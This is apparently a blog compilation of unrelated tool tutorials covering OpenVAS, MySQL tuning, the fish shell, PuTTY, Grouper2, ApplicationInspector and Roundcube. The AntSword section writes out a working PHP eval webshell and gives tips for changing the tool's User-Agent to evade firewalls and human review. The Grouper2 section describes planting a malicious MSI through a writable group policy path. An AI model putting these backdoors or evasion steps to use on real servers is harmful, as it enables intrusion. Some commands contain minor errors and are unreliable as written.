How to: Start/Use/Initialize OpenVAS – Open Vulnerability Assessment Scanner on Kali Linux (Intro)

Before using the OpenVAS, we need to setup and update it.

1 Launch a terminal, and run setup for OpenVAS

sudo openvas-setup

Wait until it finishes downloading and updating, it will take awhile

2 When it’s done, it will show the admin login username and admin login password, note them down, we will need them every time we try to login to OpenVAS

openvas-setup done
openvas-setup done

*3 Update feed for OpenVAS (Only required if there is new updates), when initializing, this step was done once already.

sudo openvas-feed-update

If failed (You might encounter this error)

rsync: failed to connect to feed.openvas.org (xx.xx.xx.xx): Connection refused (111)
rsync: failed to connect to feed.openvas.org (xx:xx:xx:xx::xx): Connection timed out (110)
rsync error: error in socket IO (code 10) at clientserver.c(127) [Receiver=3.1.3]

Just try again with the same command, it should get through.

4 Launch OpenVAS

sudo openvas-start

It will tell us the address for webui, in this case, it is https://127.0.0.1:9392

OpenVAS webui
OpenVAS webui

(We might encounter following error)

Failed to execute default Web Browser
Failed to execute default Web Browser

It’s OK, just close it, then launch our favourite web browser then enter https://127.0.0.1:9392 as the address

Now we should have the OpenVAS login screen in front of us.

OpenVAS login screen
OpenVAS login screen

5 Enter your login detail recorded from step 2

Now you will see the Dashboard of OpenVAS.

Happy hunting/fixing 🙂


AntSword – a Security Tool for Post Exploitation

AntSword
AntSword

AntSword is an very easy to use tool for pentesters, security groups as a Post Exploitation tool it can also be used for webmasters etc. Do not use this tool on unauthorized servers/environments or for illegal purpose. It can be a better alternative to Weevely

Description from Official website

AntSword is an open source, cross-platform website administration tool, being designed to meet the needs of penetration testers together with security researchers with permissions and/or authorizations as well as webmasters.
 
Anyone shall not use it for illegal purposes and profitability. Besides that, publishing unauthorized modified version is also prohibited, or otherwise bear legal responsibilities.

1 Installation

1.1 Download correct file/zip file

The AntSword-Loader (or A launcher) can be downloaded here: https://github.com/AntSwordProject/AntSword-Loader

It can be used on Microsoft Windows, Linux and macOS platforms.

Windows AntSword
Windows AntSword

1.2 Install or unzip content

Here, we unzip to “C:\Users\win10\Desktop\as-4.0.3”

Unzip AntSword
Unzip AntSword

1.3 Launch “AntSword.exe”

AntSword::Loader
AntSword::Loader

1.4 Click on “Initialize” button

1.5 Select a working directory

In this example, we create a “working-dir” working directory under main directory which is “C:\Users\win10\Desktop\as-4.0.3\working-dir”

Select the folder, then click on “Select folder” button

It will start to download necessary package (Which is “antSword-master.zip”)

(You might encounter following error)

Unzip Error Code: [object Object]

Unzip Error Code: [object Object]
Unzip Error Code: [object Object]

If you have encountered this error follow 1.5.1

1.5.1 Fix the error

Open the working directory we have just selected, a folder with name “antSword-master” and a zip file with name “antSword-master.zip” may appear there, delete them.

1.5.2 Try to launch the AntSword-Loader with Admin rights, then repeat Step 1.3 to Step 1.5 again.

We should be able to see following screen

download successful Extracting file...
download successful Extracting file…

When it’s done

Set up successful Please manually restart later!
Set up successful Please manually restart later!

Then, this Window will disappear, the program will terminate by itself.

1.6 Now we can launch the “AntSword.exe” again, it is now ready to be used

2 Simple usage Demonstration

First, we need to deploy a webshell/Sometimes… so called backdoor/Trojan

In this example we are going to use PHP

2.1 Create a php file “test.php”

2.2 Save following content to “test.php” file

<?php eval($_POST['mytestshell']); ?>

2.3 Upload to your own testing server (Please do not test on production server or any server which does not belong to you)

2.4 Right click on blank space, click on “Add”

2.5 Enter correct server details

Shell url: Your test.php path

Shell pwd: Shell password which is the content behind $_POST, “mytestshell” in this case

Shell type: PHP

2.6 Click on “Add” button

Add Shell
Add Shell

2.5 Now it will appear under “Shell Lists”

Shell Lists
Shell Lists

2.6 Double click on the item, we can now see all files on the server (As long as the user who is running the server process has corresponding privileges)

View folders, files on the server
View folders, files on the server
View folders, files on the server
View folders, files on the server

We can even upload, download files to/from selected folder/file, create, modify, delete files and folders, even open Terminal

AntSword connected to WebShell
AntSword connected to WebShell
AntSword connected to WebShell
AntSword connected to WebShell

3 Other

It also supports other Shell types besides PHP

Add shell - Shell type
Add shell – Shell type

Send customized HTTP Header/Body value

Add shell - HTTP Header, Body
Add shell – HTTP Header, Body

Other settings

Add shell - Other
Add shell – Other

Proxy, Plugin Store, Encoder etc.

AntSword
AntSword

AntSword official documentation: https://doc.u0u.us/en/getting_started/first_shell.html

Bonus 1 – Use AntSword with PHP get request

Wonder how to use AntSword with $_GET rather than $_POST in PHP?

Here is how

The PHP file

Rather than

<?php eval($_POST['mytestshell']); ?>

We use

<?php eval($_GET['mytestshell']); ?>

The Settings in AntSword

Shell url: http://xxxxxxxxxx.com/test.php?mytestshell=eval($_POST[‘mypswd’]);

Shell pwd: mypswd

Bonus 2 – Modify User-Agents

By default, AntSword uses “antSword/v2.1” or “antSword/v2.0” as user agent when updating the webshell information or connecting the webshell. Which can be recognized by WAF or human easily.

To change User-Agent for AntSword.

There are 2 files and 3 places we need to modify

b2.1.1 File 1 is “request.js” under “X:\path\to\antsword\working-dir\antSword-master\modules\request.js”

Note: “working-dir” was created during Step 1.5

b2.1.2 Open “request.js” via Notepad or any text editor, Search for “USER_AGENT”

b2.1.3 Change “antSword/v2.1” to what ever you like, then save the file

b2.2.1 File 2 is “update.js” under “X:\path\to\antsword\working-dir\antSword-master\modules\update.js”

b2.2.2 Open “update.js” via Notepad or any text editor, Search for “User-Agent”

b2.2.3 Change “antSword/v2.0” to what ever you like, then save the file

Bonus 3 – Latest User-Agents

Chrome

on Windows

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

on Linux

Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

on macOS

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

on Android

Mozilla/5.0 (Linux; Android 8.0.0;) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Mobile Safari/537.36

on iOS

Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/80.0.3987.95 Mobile/15E148 Safari/605.1

Firefox

on Windows

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/74.0

on Linux

Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/74.0

on macOS

Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/74.0

on Android

Mozilla/5.0 (Android 8.0.0; Mobile; rv:61.0) Gecko/61.0 Firefox/68.0

on iOS

Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/23.0 Mobile/16B92 Safari/605.1.15

IE 11/Internet Explorer 11 on Windows 10

Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko

Edge on Windows 10

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36 Edg/80.0.361.62

YandexBot

Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)


There are many more features we can utilize, including encoding/decoding, which is very helpful when trying to evading Web Application Firewall (WAF), plugins, Multipart payload etc.

Warning: Do not use or test this tool on unauthorised servers.


How to: Optimize MySQL, MariaDB with Simple Tools

1 mysqltuner.pl

mysqltuner.pl
mysqltuner.pl

Supports MySQL, MariaDB, Percona Server etc. with over 300

Tuning MySQL performance, checks configuration, including log file settings, storage engine, security. Outline potential issues/fix.

1.1 Download

cd /tmp
 
wget https://raw.githubusercontent.com/major/MySQLTuner-perl/master/mysqltuner.pl
 
chmod +x mysqltuner.pl

1.2 Usage

 ./mysqltuner.pl --socket /var/lib/mysql/mysql.sock 

1.3 Output

Items with [!!] are important e.g. Maximum possible memory usage: 10G (300% of installed RAM)

Last section with “Recommendations” tells us where we can look into, which Variables we should adjust and suggested values etc.

mysqltuner.pl: https://github.com/major/MySQLTuner-perl

2 tuning-primer.sh

Similar to mysqltuner.pl.

Currently it handles recomendations for the following:

  • Slow Query Log
  • Max Connections
  • Worker Threads
  • Key Buffer [MyISAM only]
  • Query Cache
  • Sort Buffer
  • Joins
  • Temp Tables
  • Table (Open & Definition) Cache
  • Table Locking
  • Table Scans (read_buffer) [MyISAM only]
  • InnoDB Status

2.1 Download

cd /tmp
 
wget https://launchpad.net/mysql-tuning-primer/trunk/1.6-r1/+download/tuning-primer.sh
 
chmod +x tuning-primer.sh

2.2 Usage

./tuning-primer.sh

tuning-primer.sh: https://github.com/BMDan/tuning-primer.sh

3 pt-variable-advisor

Analyses MySQL variables, output suggestions based on those variables.

3.1 Download

https://www.percona.com/downloads/percona-toolkit/LATEST/

3.2 Usage

pt-variable-advisor localhost --socket /var/lib/mysql/mysql.sock

4 pt-qurey-digest

Analyses log, process list, tcpdump for MySQL queries. Mainly used to analyze slow queries. pt-qurey-digest outputs more details compare to py-query_digest.

4.1 Download

Sames as “3 pt-variable-advisor”

4.2 Usage

pt-query-digest /var/lib/mysql/slowtest-slow.log

4.3 Other usages

# Analyze slow quires
pt-query-digest /var/lib/mysql/slowtest-slow.log > slow_report.log
 
# Quires within 24 hours
pt-query-digest --since=24h /var/lib/mysql/slowtest-slow.log > slow_report.log
 
# Quires within specified time frame
pt-query-digest /var/lib/mysql/slowtest-slow.log --since '2020-01-01 00:00:00' --until '2012-01-10 00:00:00'> > slow_report.log
 
# Slow quires with select
pt-query-digest --filter '$event->{fingerprint} =~ m/^select/i' /var/lib/mysql/slowtest-slow.log> slow_report.log
 
# Query from specific user
pt-query-digest --filter '($event->{user} || "") =~ m/^root/i' /var/lib/mysql/slowtest-slow.log> slow_report.log
 
# All full table scanning, full join slow quires
pt-query-digest --filter '(($event->{Full_scan} || "") eq "yes") ||(($event->{Full_join} || "") eq "yes")' /var/lib/mysql/slowtest-slow.log> slow_report.log

Powerful Linux Interactive shell

fish (friendly interactive shell) is a smart and user-friendly command line shell for Linux, macOS, and the rest of the family.

Autosuggestions

Autosuggestion Thumbnail

fish suggests commands as you type based on history and completions, just like a web browser. Watch out, Netscape Navigator 4.0!

Glorious VGA Color

Colors Thumbnail

fish supports 24 bit true color, the state of the art in terminal technology. Behold the monospaced rainbow.

Sane Scripting

Scripting Thumbnail

fish is fully scriptable, and its syntax is simple, clean, and consistent. You’ll never write esac again.

Web Based configuration

Web Config Thumbnail

For those lucky few with a graphical computer, you can set your colors and view functions, variables, and history all from a web page.

Man Page Completions

Man Page Completions Thumbnail

Other shells support programmable completions, but only fish generates them automatically by parsing your installed man pages.

Works Out Of The Box

Works Out of the Box Thumbnail

fish will delight you with features like tab completions and syntax highlighting that just work, with nothing new to learn or configure.

fish can be installed easily on most Linux distros with their default package manager.

Linux

# Debian/Ubuntu/Kali Linux etc.
sudo apt install fish
 
# RHEL/CentOS/Fedora
sudo dns install fish
or, for older version
sudo yum install fish
 
# Archlinux
pacman -S fish
 
# gentoo Linux
emerge fish
 
# void-Linux
xbps-install fish-shell
 
# NixOS
nix-env -i fish
 
# Guix
guix package -i fish
 
# Solus
eopkg install fish
 
# Hombrew
brew install fish

BSD

# FreeBSD
pkg install fish
 
# OpenBSD
pkg_add fish

Windows

# Cygwin
fish is available in setup, in the Shells category.
 
# Windows Subsystem for Linux
sudo apt install fish
or
depend on the Linux distro you've chose, refer to the above "Linux" part to find correct command to use
 
# MSYS2
pacman -S fish

masOS

# Homebrew
brew install fish
 
# MacPorts
sudo port install fish
 
# Installer
https://github.com/fish-shell/fish-shell/releases/download/3.1.0/fish-3.1.0.pkg
 
10.6+: Installs to /usr/local/

Bonus

  • To use, type fish in the terminal then hit Enter key

To check fish version

echo $FISH_VERSION

HTML version help document

help

To switch default shell to fish

sudo chsh -s /usr/bin/fish

To switch back to default bash shell

sudo chsh -s /bin/bash

(If your default shell is zsh)

sudo chsh -s /usr/zsh

Simple/Quick List of Free Code Editors (Include free, open source)

(There are many commercial editors with trial period, they are not included in this list, only free or open source editors are listed)

  1. Aptana Studio (Windows, Linux, macOS)
  2. Atom.io (Windows, Linux, macOS)
  3. Crimson Editor (Windows)
  4. jEdit (Windows, Linux, macOS)
  5. Notepad++ (Windows)
  6. Programmer’s Notepad (Windows)
  7. PSPad (Windows)
  8. SCREEM (Linux) (HTML/Web)
  9. Visual Studio Code (Windows, Linux, macOS)

Open source/Free tools to find vulnerability in Active Directory (AD) – Grouper2

Grouper2 vs Grouper

Grouper

1 The computer must be joined to the domain with GPMC and RSAT installed

2 User must use Get-GPOReport with PowerShell to generate XML report

3 The report is required by Grouper

4 Users must manually filter out useful data

Grouper2

Grouper2 does not rely on Get-GPOReport, it still needs to parse different types of files format.

1 More accurate file permission detection, no read/write of storage required

2 Won’t ignore GPP password

3 Provide HTML format output

4 Multi-thread support

5 Supports offline mode

Official description

What is it for?

Grouper2 is a tool for pentesters to help find security-related misconfigurations in Active Directory Group Policy.

It might also be useful for other people doing other stuff, but it is explicitly NOT meant to be an audit tool. If you want to check your policy configs against some particular standard, you probably want Microsoft’s Security and Compliance Toolkit, not Grouper or Grouper2.

What does it do?

It dumps all the most interesting parts of group policy and then roots around in them for exploitable stuff.

How is it different from Grouper?

Where Grouper required you to:

  • have GPMC/RSAT/whatever installed on a domain-joined computer
  • generate an xml report with the Get-GPOReport PowerShell cmdlet
  • feed the report to Grouper
  • a bunch of gibberish falls out and hopefully there’s some good stuff in there.

Grouper2 does like Mr Ed suggests and goes straight to the source, i.e. SYSVOL.

This means you don’t have the horrible dependency on Get-GPOReport (hooray!) but it also means that it has to do a bunch of parsing of different file formats and so on (booo!).

Other cool new features:

  • better file permission checks that don’t involve writing to disk.
  • doesn’t miss those GPP passwords that Grouper 1 did.
  • HTML output option so you can preserve those sexy console colours and take them with you.
  • aim Grouper2 at an offline copy of SYSVOL if you want.
  • it’s multithreaded!
  • a bunch of other great stuff but it’s late and I’m tired.

Also, it’s written in C# instead of PowerShell.

How do I use it?

Literally just run the EXE on a domain joined machine in the context of a domain user, and magic JSON candy will fall out.

If the JSON burns your eyes, add -g to make it real pretty.

If you love the prettiness so much you wanna take it with you, do -f "$FILEPATH.html" to puke the candy into an HTML file.

If there’s too much candy and you want to limit output to only the tastiest morsels, set the ‘interest level’ with -i $INT, the bigger the number the tastier the candy, e.g. -i 10 will only give you stuff that will probably result in creds or shells.

If you don’t want to dig around in old policy and want to limit yourself to only current stuff, do -c.

If you want the candy to fall out faster, you can set the number of threads with -t $INT – the default is 10.

If you want to see the other options, do -h.

I don’t get it.

OK have a look at this:

A picture of some Grouper2 output

In the screenshot above we can see an “Assigned Application” policy that is still being pushed to computers, but the MSI file to install is missing, and the directory it’s being installed from is writable by the current user.

If you created a hacked up MSI (e.g. with msfvenom) and then modified it to match the UIDs at the bottom of the picture, it would get executed on machines targeted by the GPO. Sweet!

A picture of some Grouper2 output

In this one you can see that someone’s done something absolutely insane to the ACLS on the registry.

You get the picture.

Resource

Official Github page


Open source SSH/Telnet client

There are many open source and free SSH/Telnet clients, one of them is PuTTY.

PuTTY is very easy to use since it has GUI.

It can be downloaded from their official website

It has Microsoft Windows version, both in msi and exe format. It can be installed on the system or executed directly without installation.

It has Unix/Linux version as well, which can be downloaded from their official website too (source archive)

For Linux operating systems, we can also install directly from package managers as well.

Install on Linux

# Debian/Ubuntu/Kali Linux etc.
sudo apt install putty
 
# CentOS/RHEL/Fedora
sudo dnf install putty
or
sudo yum install putty
 
# Arch Linux
sudo pacman -S putty

Install on Linux from source

tar -xvf putty-0.73.tar.gz
cd putty-0.73/
./configure
sudo make && sudo make install

How to: Put panorama photo together – Panorama photo stitcher

Sometimes we want to put panorama photos together, so that we can have a complete photo.

It can be time consuming if we do it manually, also it requires skill to be done.

To make it easier, we can use software to achieve same or even better results.

Hugin is an open source and completely free software just does that and it’s easy to use as well.

Hugin
Hugin

Some technical details can be found here: Photometric alignment and vignetting correction

Download


An Code Analysis software – ApplicationInspector

Introduction

Microsoft Application Inspector is a software source code analysis tool that helps identify and surface well-known features and other interesting characteristics of source code to aid in determining what the software is or what it does. It has received attention on ZDNetSecurityWeekCSOOnlineLinux.com/newsHelpNetSecurity, Twitter and more and was first featured on Microsoft.com.

Application Inspector is different from traditional static analysis tools in that it doesn’t attempt to identify “good” or “bad” patterns; it simply reports what it finds against a set of over 400 rule patterns for feature detection including features that impact security such as the use of cryptography and more. This can be extremely helpful in reducing the time needed to determine what Open Source or other components do by examining the source directly rather than trusting to limited documentation or recommendations.

The tool supports scanning various programming languages including C, C++, C#, Java, JavaScript, HTML, Python, Objective-C, Go, Ruby, PowerShell and more and can scan projects with mixed language files. It also includes HTML, JSON and text output formats with the default being an HTML report similar to the one shown here.

AppInspector-Features

It includes a filterable confidence indicator to help minimize false positives matches as well as customizable default rules and conditional match logic.

Be sure to see our project wiki page for more help https://Github.com/Microsoft/ApplicationInspector/wiki for illustrations and additional information and help.

Goals

Application Inspector helps inform you better for choosing the best components to meet your needs with a smaller footprint of unknowns for keeping your application attack surface smaller. It helps you to avoid inclusion of components with unexpected features you don’t want.

Application Inspector can help identify feature deltas or changes between component versions which can be critical for detecting injection of backdoors.

It can be used to automate detection of features of interest to identify components that require additional scrutiny as part of your build pipeline or create a repository of metadata regarding all of your enterprise application.

Basically, we created Application Inspector to help us identify risky third party software components based on their specific features, but the tool is helpful in many non-security contexts as well.

Application Inspector v1.0 is now in GENERAL AUDIENCE release status. Your feedback is important to us. If you’re interested in contributing, please review the CONTRIBUTING.md.

Contribute

We have a strong default starting base of Rules for feature detection. But there are many feature identification patterns yet to be defined and we invite you to submit ideas on what you want to see or take a crack at defining a few. This is a chance to literally impact the open source ecosystem helping provide a tool that everyone can use. See the Rules section of the wiki for more.

Getting Application Inspector

To use Application Inspector, download the relevant binary (either platform-specific or the multi-platform .NET Core release). If you use the .NET Core version, you will need to have .NET Core 3.0 or later installed. See the JustRunIt.md or Build.md files for help.

It might be valuable to consult the project wiki for additional background on Rules, Tags and more used to identify features. Tags are used as a systematic hierarchical nomenclature e.g. Cryptography.Protocol.TLS to more easily represent features.

Usage

Application Inspector is a command-line tool. Run it from a command line in Windows, Linux, or MacOS.

> dotnet AppInspector.dll or on *Windows* simply AppInspector.exe <command> <options>
Microsoft Application Inspector 1.0.25
ApplicationInspector 1.0.25
(c) Microsoft Corporation. All rights reserved
ERROR(S):
  No verb selected.
  analyze        Inspect source directory/file/compressed file (.tgz|zip) against defined characteristics
  tagdiff        Compares unique tag values between two source paths
  tagtest        Test presence of smaller set or custom tags in source (compare or verify modes)
  exporttags     Export default unique rule tags to view what features may be detected
  verifyrules    Verify rules syntax is valid
  help           Display more information on a specific command
  version        Display version information

Examples:

Command Help

Usage: dotnet AppInspector.dll [arguments] [options]
dotnet AppInspector.dll -description of available commands
dotnet AppInspector.dll <command> -options description for a given command

Analyze Command

Usage: dotnet AppInspector.dll analyze [arguments] [options]
Arguments:
 -s, --source-path             Required. Path to source code to inspect (required)
 -o, --output-file-path        Path to output file.  Ignored with -f html option which auto creates output.html
 -f, --output-file-format      Output format [html|json|text]. Default = html
 -e, --text-format             Match text format specifiers 
 -r, --custom-rules-path       Custom rules path
 -t, --tag-output-only         Output only contains identified tags. Default = false
 -i, --ignore-default-rules    Ignore default rules bundled with application. Default = false
 -d, --allow-dup-tags          Output only non-unique tag matches. Default = false
 -c, --confidence-filters      Output only matches with confidence [high|medium|low].  Default = high,medium
 -k, --file-path-exclusions    Exclude source files [none|<list>]. Default = sample,example,test,docs,.vs,.git
 -x, --console-verbosity       Console verbosity [high|medium|low|none].  Default = medium
 -l, --log-file-path           Log file path.  Default is <application path>/log.txt
 -v, --log-file-level          Log file level [Debug|Info|Warn|Error|Fatal|Off].  Default = Error
Scan a project directory, with output sent to “output.html” (default behavior includes launching default browser to this file)
dotnet AppInspector.dll analyze -s /home/user/myproject
Add custom rules (can be specified multiple times)
dotnet AppInspector.dll analyze -s /home/user/myproject -r /my/rules/directory -r /my/other/rules
Write to JSON format
dotnet AppInspector.dll analyze -s /home/user/myproject -f json

Tagdiff Command

Use to analyze and report on differences in tags (features) between two project or project versions e.g. v1, v2 to see what changed

Usage: dotnet AppInspector.dll tagdiff [arguments] [options]
Arguments:
 --src1                        Required. Source 1 to compare (required)
 --src2                        Required. Source 2 to compare (required
 -t, --test-type               Type of test to run [equality|inequality].  Default = equality
 -r, --custom-rules-path       Custom rules path
 -i, --ignore-default-rules    Ignore default rules bundled with application.  Default = false
 -o, --output-file-path        Path to output file
 -x, --console-verbosity       Console verbosity [high|medium|low].  Default = medium
 -l, --log-file-path           Log file path
 -v, --log-file-level          Log file level [error|trace|debug|info].  Default = error
Simplist way to see the delta in tag features between two projects
dotnet AppInspector.dll tagdiff --src1 /home/user/project1 --src2 /home/user/project2
Basic use
dotnet AppInspector.dll tagdiff --src1 /home/user/project1 --src2 /home/user/project2 -t equality
Basic use
dotnet AppInspector.dll tagdiff --src1 /home/user/project1 --src2 /home/user/project2 -t inequality

TagTest Command

Used to verify (pass/fail) that a specified set of rule tags is present or not present in a project e.g. user only wants to know true/false if cryptography is present as expected or if personal data is not present as expected and get a simple yes/no result rather than a full analysis report.

Note: The user is expected to use the custom-rules-path option rather than the default ruleset because it is unlikely that any source package would contain all of the default rules. Instead, create a custom path and rule set as needed or specify a path using the custom-rules-path to point only to the rule(s) needed from the default set.
Otherwise, testing for all default rules present in source will likely yield a false or fail result in most cases.

Usage: dotnet AppInspector.dll tagtest [arguments] [options
Arguments:
 -s, --source-path             Required. Source to test (required)
 -t, --test-type               Test to perform [rulespresent|rulesnotpresent].  Default = rulespresent
 -r, --custom-rules-path       Custom rules path 
 -i, --ignore-default-rules    Ignore default rules bundled with application.  Default = true
 -o, --output-file-path        Path to output file
 -x, --console-verbosity       Console verbosity [high|medium|low].  Default = medium
 -l, --log-file-path           Log file path
 -v, --log-file-level          Log file level

Simplest use to see if a set of rules are all present in a project

dotnet AppInspector.dll tagtest -s /home/user/project1 -r /home/user/myrules.json

Basic use

dotnet AppInspector.dll tagtest -s /home/user/project1 -r /home/user/myrules.json -t rulespresent

Basic use

dotnet AppInspector.dll tagtest -s /home/user/project1 -r /home/user/myrules.json -t rulesnotpresent

ExportTags Command

Simple export of the ruleset schema for tags representing what features are supported for detection

Usage: dotnet AppInspector.dll exporttags [arguments] [options]
Arguments:
 -r, --custom-rules-path       Custom rules path
 -i, --ignore-default-rules    Ignore default rules bundled with application.  Default = false
 -o, --output-file-path        Path to output file
 -x, --console-verbosity       Console verbosity [high|medium|low].  Default = medium
Export default rule tags to console
dotnet AppInspector.dll exporttags
Using output file
dotnet AppInspector.dll exporttags -o /home/user/myproject/exportags.txt
With custom rules and output file
dotnet AppInspector.dll exporttags -r /home/user/myproject/customrules -o /home/user/myproject/exportags.txt

Verify Command

Verification that ruleset is compatible and error free for import and analysis

Usage: dotnet AppInspector.dll verifyrules [arguments]
Arguments:
 -r, --custom-rules-path       Custom rules path
 -i, --ignore-default-rules    Ignore default rules bundled with application.  fault = false
 -o, --output-file-path        Path to output file
 -x, --console-verbosity       Console verbosity [high|medium|low].  Default = medium.
Simplist case to verify default rules
dotnet AppInspector.dll verifyrules
Using custom rules only
dotnet AppInspector.dll verifyrules -r /home/user/myproject/customrules -i

Build Instructions

Building from source requires .NET Core 3.0. Standard dotnet build commands can be run from the root source folder.

Framework Dependent

dotnet build -c Release

Platform Targeted Portable

dotnet publish -c Release -r win-x86
dotnet publish -c Release -r linux-x64
dotnet publish -c Release -r osx-x64

How to: Upgrade Roundcube webmail easily with terminal/command

Roundcube is an open source web/online MUA (mail user agent)

Note!: Don’t forget to change the download link and folder name for wget and Install/Update (Step 2 and 4)

#1 Switch to /tmp directory
cd /tmp
 
#2 Download the package with wget
wget https://github.com/roundcube/roundcubemail/releases/download/1.4.3/roundcubemail-1.4.3-complete.tar.gz
 
#3 Extract the package
tar xf roundcubemail-*.tar.gz
 
#4 Install/Update
./roundcubemail-1.4.3/bin/installto.sh /destinationFolder/roundcube

Extended Reading

MUA (mail user agent) Is used for users to read, compose, and send email. Examples of MUAs are Roundcube, SquirrelMail, pine, Microsoft Outlook etc.

MTA (mail transfer agent) Is used for the transport, delivery, and forwarding of email. Examples of MTAs like SMTP servers are POSTFIX, sendmail etc.